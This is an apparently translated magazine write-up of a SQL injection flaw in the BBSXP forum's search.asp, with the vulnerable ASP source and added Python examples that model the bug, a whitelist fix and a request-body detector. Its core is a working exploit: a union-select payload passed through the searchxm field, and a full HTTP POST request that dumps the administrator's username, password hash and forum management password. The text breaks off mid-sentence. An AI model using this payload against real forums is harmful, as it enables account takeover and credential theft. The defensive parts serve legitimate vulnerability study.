BBSXP injection vulnerability

bbsxp  Date: 2021-02-07

bbsxp注入漏洞BBSXP injection vulnerability

BBSXP injection vulnerability

BBSXP injection vulnerability

The new BBSXP injection vulnerability, reproduced: the administrator account password can be read out directly.

-- A summary of the BBSXP 5 SP1 vulnerability

An earlier issue of the magazine carried an article about BBSXP. It described a cookie injection attack; the author was ingenious to spot that logic flaw.

After reading that article I did not look at the code myself at the time. With nothing to do during the summer vacation, I downloaded the latest version of BBSXP and read it through.

BBSXP really is small: the files are short, and it is quite different from DVBBS in both its functions and its interface.

But it still has a small flaw, even after three years of use and testing.

One. The search vulnerability

BBSXP converts string input with HTMLEncode, and guards numeric input with Int() and IsNumeric() checks.

So clearly neither the numbers nor the strings in a query can be used as injection points, at least not as values. If input cannot be injected as a value, what else can it be injected as? That is the crux of the matter: look for places where user input ends up in the query as something other than a value, such as a column name.

With that idea I went through every file, and it took a long time before I reached search.asp.

(It seems to have had a hole before; the original one was fixed, but a new one remains.) I found one; let's look at the code together.

<!--#include file="setup.asp"-->
<%
top
if request.cookies("username")=empty then error("<li>You have not <a href=login.asp>logged in</a>")
DetectPost
if request("menu")="ok" then
search=request("search")
forumid=request("forumid")
TimeLimit=request("TimeLimit")
content=HTMLEncode(request("content"))
searchxm=HTMLEncode(request("searchxm"))
searchxm2=HTMLEncode(request("searchxm2"))
searchxm2=replace(searchxm2,"@","&")
if content=empty then content=request.cookies("username")
if isnumeric(""&forumid&"") then forumidor="forumid="&forumid&" and"
if search="author" then
item=" "&searchxm&"='"&content&"'"
elseif search="key" then
item=" "&searchxm2&" like '%"&content&"%'"
end if
if TimeLimit<>"" then TimeLimitList=" and lasttime>"&SqlNowString&"-"&int(TimeLimit)&""
sql="select top "&MaxSearch&" * from forum where deltopic<>1 and"&forumidor&""&item&""&TimeLimitList&" order by lasttime desc"
rs.open sql,conn,1
......

Note the check at the top: the page only does anything for a request that carries a non-empty username cookie, so the attacker has to be logged in as some registered user (the request later in this article uses the admin cookie, but the check does not care which account it is).

Let's look more closely at sql="select top "&MaxSearch&"... MaxSearch is defined elsewhere with a default value of 500, which leaves three pieces that come from outside input:

1. if isnumeric(""&forumid&"") then forumidor="forumid="&forumid&" and"

As long as forumid is submitted empty, forumidor stays empty.

2. if TimeLimit<>"" then TimeLimitList=" and lasttime>"&SqlNowString&"-"&int(TimeLimit)&""

TimeLimit is cast to an integer; if we enter 1, TimeLimitList becomes " and lasttime>now()-1" (on MSSQL, SqlNowString is getdate() rather than now(), so it reads " and lasttime>getdate()-1").

3. if search="author" then
item=" "&searchxm&"='"&content&"'"
elseif search="key" then
item=" "&searchxm2&" like '%"&content&"%'"
end if

As long as search=author and content is anything at all (say abcd), item becomes " HTMLEncode(searchxm)='abcd'".

So once we construct the input and push it through the statement above, the SQL becomes:

select top 500 * from forum where deltopic<>1 and [HTMLEncode(searchxm)]='abcd' and lasttime>now()-1 order by lasttime desc

The part in square brackets goes into the query without any surrounding single quotes, because it is meant to be a column name rather than a value, so obviously it can be exploited.

Let's look at the HTMLEncode function first:

function HTMLEncode(fString)
fString=replace(fString,";","&#59;")
fString=server.htmlencode(fString)
fString=replace(fString,"'","&#39;")
fString=replace(fString,"--","&#45;&#45;")
fString=replace(fString,"\","&#92;")
fString=replace(fString,vbCrlf,"<br>")
HTMLEncode=fString
end function

The filtering is quite thorough; the programmer had a hard time here, because filtering any more than this would start to break normal use. Note what it leaves alone, though: spaces, commas, equals signs, dots, parentheses and square brackets all pass through unchanged, which is exactly what a column-name position needs.

So how do we get past this filter? Naturally one option is guessing (blind injection, one condition at a time); that is a feasible method, and since the table structure is known it is easy to guess. But I'll do it the simple way.

Two. Exploit

A familiar union query does the job, and it works on both Access and MSSQL. I won't spell out the construction, just show the result:

select top 500 * from forum where deltopic<>1 and forumid=0 union all select top 1 1,[user].username as topic,forum.username,content,forum.posttime,forum.postip,1,1,1,1,1,1,1,[user].userpass as lastname,lasttime,polltopic,clubconfig.adminpassword as pollresult,1 from [user],forum,clubconfig where [user].membercode=5 or forum.id=0 or clubconfig.adminpassword='abcd' and lasttime>now()-1 order by lasttime desc

The highlighted part in the magazine, from forumid=0 up to and including clubconfig.adminpassword, is the value we enter as searchxm; not one character in it is touched by HTMLEncode. The ='abcd' that follows is appended by search.asp itself from the content field. (The " and lasttime>now()-1" clause is only present when TimeLimit is submitted; the request below leaves it empty.)

The meaning of the statement: the part in front of the union is false, because forumid can never be 0, so the union returns only the one record that contains the administrator's username and encrypted password, together with the encrypted forum-management password from clubconfig.

Anyone who knows SQL will see it. The 1s carry no meaning; they pad the column list so that the number and types of columns before and after the union line up.

From here you can construct your own queries; the above is only a reference.
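The following Python model ties together the three passages above: the way search.asp assembles the query, the HTMLEncode filter, and the union payload. It is an added example written for this page, not BBSXP's own code. html_encode() and build_search_sql() follow the ASP quoted in the article (IsNumeric() is simplified to a digits-only check, and Server.HTMLEncode is reduced to the four ASCII characters it escapes). PAYLOAD_SEARCHXM is the article's searchxm value re-typed as a constant. safe_search_sql(), ALLOWED_COLUMNS and hardened_rejects() are this example's own hardened variant, and the column list in ALLOWED_COLUMNS is an assumption, not BBSXP's real set of searchable fields.

```python
"""Model of BBSXP search.asp query assembly, its HTMLEncode filter, and a
whitelist-based fix. Added example for this page; not BBSXP's own code."""

MAX_SEARCH = 500      # MaxSearch default, as stated in the article
SQL_NOW = "now()"     # SqlNowString on Access; getdate() on MSSQL

# The article's searchxm value, re-typed here as a constant.
PAYLOAD_SEARCHXM = (
    "forumid=0 union all select top 1 1,[user].username as topic,"
    "forum.username,content,forum.posttime,forum.postip,1,1,1,1,1,1,1,"
    "[user].userpass as lastname,lasttime,polltopic,"
    "clubconfig.adminpassword as pollresult,1 "
    "from [user],forum,clubconfig "
    "where [user].membercode=5 or forum.id=0 or clubconfig.adminpassword"
)


def html_encode(s: str) -> str:
    """Port of BBSXP's HTMLEncode(), same replacement order as the ASP.
    Space, comma, '=', '.', '(', ')', '[' and ']' are never touched."""
    s = s.replace(";", "&#59;")
    s = (s.replace("&", "&amp;").replace("<", "&lt;")      # Server.HTMLEncode
          .replace(">", "&gt;").replace('"', "&quot;"))    # (ASCII part only)
    s = s.replace("'", "&#39;")
    s = s.replace("--", "&#45;&#45;")
    s = s.replace("\\", "&#92;")
    s = s.replace("\r\n", "<br>")
    return s


def build_search_sql(form: dict, cookie_username: str = "") -> str:
    """The vulnerable assembly from search.asp (menu=ok branch)."""
    search = form.get("search", "")
    forumid = form.get("forumid", "")
    timelimit = form.get("TimeLimit", "")
    content = html_encode(form.get("content", ""))
    searchxm = html_encode(form.get("searchxm", ""))
    searchxm2 = html_encode(form.get("searchxm2", "")).replace("@", "&")
    if content == "":
        content = cookie_username
    forumidor = ""
    if forumid.isdigit():                      # simplified isnumeric(""&forumid&"")
        forumidor = f"forumid={forumid} and"
    item = ""
    if search == "author":                     # searchxm lands unquoted: a column NAME
        item = f" {searchxm}='{content}'"
    elif search == "key":
        item = f" {searchxm2} like '%{content}%'"
    timelimit_list = ""
    if timelimit != "":
        timelimit_list = f" and lasttime>{SQL_NOW}-{int(timelimit)}"
    return (f"select top {MAX_SEARCH} * from forum where deltopic<>1 and"
            f"{forumidor}{item}{timelimit_list} order by lasttime desc")


def payload_survives_filter(payload: str = PAYLOAD_SEARCHXM) -> bool:
    """True when HTMLEncode returns the payload unchanged (the whole trick)."""
    return html_encode(payload) == payload


# Hardened variant (this example's own fix, not a BBSXP patch): the column
# name must come from a whitelist and the search value is bound as a parameter.
ALLOWED_COLUMNS = {"topic", "username", "content"}   # assumed searchable columns


def safe_search_sql(form: dict, cookie_username: str = ""):
    """Returns (sql_with_? placeholders, params); raises ValueError on bad input."""
    search = form.get("search", "")
    column = form.get("searchxm", "") if search == "author" else form.get("searchxm2", "")
    if column not in ALLOWED_COLUMNS:
        raise ValueError(f"not an allowed column: {column!r}")
    content = form.get("content", "") or cookie_username
    where, params = "deltopic<>1", []
    forumid = form.get("forumid", "")
    if forumid != "":
        if not forumid.isdigit():
            raise ValueError("forumid must be an integer")
        where += " and forumid=?"
        params.append(int(forumid))
    if search == "author":
        where += f" and {column}=?"
        params.append(content)
    elif search == "key":
        where += f" and {column} like ?"
        params.append(f"%{content}%")
    else:
        raise ValueError("unknown search mode")
    return f"select top {MAX_SEARCH} * from forum where {where} order by lasttime desc", params


def hardened_rejects(form: dict) -> bool:
    """True when safe_search_sql() refuses the form."""
    try:
        safe_search_sql(form)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    attack = {"search": "author", "content": "abcd", "searchxm": PAYLOAD_SEARCHXM,
              "forumid": "", "TimeLimit": "1"}
    print("payload unchanged by HTMLEncode:", payload_survives_filter())
    print(build_search_sql(attack))
    print("hardened builder rejects it:", hardened_rejects(attack))
```

Running it prints the same union query the article shows (with 'abcd' as the appended value), confirms that HTMLEncode leaves the payload untouched, and shows the whitelist version refusing it before any SQL is built. The point of the fix is that a column name can never be parameterised, so it has to be validated against a fixed list; only the value goes through a bound parameter.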

Now construct the input and submit it. Think of the classic WSE; if anyone would rather hand-write their own HTTP submission strings, I'd advise them to save the effort and brainpower.

(figure 1)


The constructed request is submitted as follows:

POST /BBSXP/search.asp?menu=ok HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Referer: http://localhost:8000/bbsxp/search.asp
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0; MyIE2)
Host: localhost:8000
Content-Length: 481
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: eremite=0; userpass=E80B5017098950FC58AAD83C8C14978E; username=admin; skins=1; ASPSESSIONIDSSRQSDTB=OGLJMADCECKAFKGCPCCHBKHO; onlinetime=2004%2d8%2d13+08%3a33; addmin=0

content=fsaf&search=author&searchxm=forumid%3d0+union+all+select+top+1+1%2c%5buser%5d.username+as+topic%2cforum.username%2ccontent%2cforum.posttime%2cforum.postip%2c1%2c1%2c1%2c1%2c1%2c1%2c1%2c%5buser%5d.userpass+as+lastname%2clasttime%2cpolltopic%2cclubconfig.adminpassword+as+pollresult%2c1+from+%5buser%5d%2cforum%2cclubconfig+where+%5buser%5d.membercode%3d5+or+forum.id%3d0+or+clubconfig.adminpassword&searchxm2=topic&TimeLimit=&forumid=&submit1=%BF%AA%CA%BC%CB%D1%CB%F7
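To see what that request actually carries, the following Python snippet decodes the form body and applies the kind of check a front-end filter or WAF rule would apply to it. It is an added example, not part of the article: CAPTURED_BODY is the request body re-typed from the page with the line breaks removed, the GB2312 charset is an assumption about the code page the forum ran under (it is what makes the submit1 button label decode), and decode_form() and flag_column_fields() are this example's own.

```python
"""Decode the captured search.asp POST body and flag the field that carries
SQL instead of a column name. Added example; not from the article."""
import re
from urllib.parse import parse_qs

# Re-typed from the request shown above (constructed test input).
CAPTURED_BODY = (
    "content=fsaf&search=author&searchxm=forumid%3d0+union+all+select+top+1+1%2c"
    "%5buser%5d.username+as+topic%2cforum.username%2ccontent%2cforum.posttime"
    "%2cforum.postip%2c1%2c1%2c1%2c1%2c1%2c1%2c1%2c%5buser%5d.userpass+as+lastname"
    "%2clasttime%2cpolltopic%2cclubconfig.adminpassword+as+pollresult%2c1+from+"
    "%5buser%5d%2cforum%2cclubconfig+where+%5buser%5d.membercode%3d5+or+forum.id"
    "%3d0+or+clubconfig.adminpassword&searchxm2=topic&TimeLimit=&forumid="
    "&submit1=%BF%AA%CA%BC%CB%D1%CB%F7"
)

IDENTIFIER = re.compile(r"[A-Za-z_][A-Za-z0-9_]*")
SQL_WORDS = re.compile(r"\b(union|select|from|where|insert|update|delete|drop)\b", re.I)


def decode_form(body: str, charset: str = "gb2312") -> dict:
    """Decode an application/x-www-form-urlencoded body; %XX bytes are
    interpreted in the given charset (GB2312 assumed for this forum)."""
    fields = parse_qs(body, keep_blank_values=True, encoding=charset, errors="strict")
    return {name: values[0] for name, values in fields.items()}


def flag_column_fields(form: dict, column_fields=("searchxm", "searchxm2")) -> dict:
    """Fields that should carry a bare column name but do not.
    Returns {field_name: reason}; empty dict means nothing suspicious."""
    flagged = {}
    for name in column_fields:
        value = form.get(name, "")
        if not IDENTIFIER.fullmatch(value):
            flagged[name] = "not a bare identifier"
        elif SQL_WORDS.search(value):
            flagged[name] = "SQL keyword"
    return flagged


if __name__ == "__main__":
    form = decode_form(CAPTURED_BODY)
    for name, value in form.items():
        print(f"{name} = {value!r}")
    print("flagged:", flag_column_fields(form))
```

Decoding makes the submit1 value readable (it is the button label), shows TimeLimit and forumid submitted empty so that neither the forumid= clause nor the lasttime clause gets into the query, and leaves searchxm as the one field whose value is a whole SELECT rather than an identifier. A rule that allows only identifiers in those two fields catches this request without needing any SQL-keyword signature at all; the keyword check is a fallback for values that are single words.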

I've written an HTML page for the searchxm part, which can be
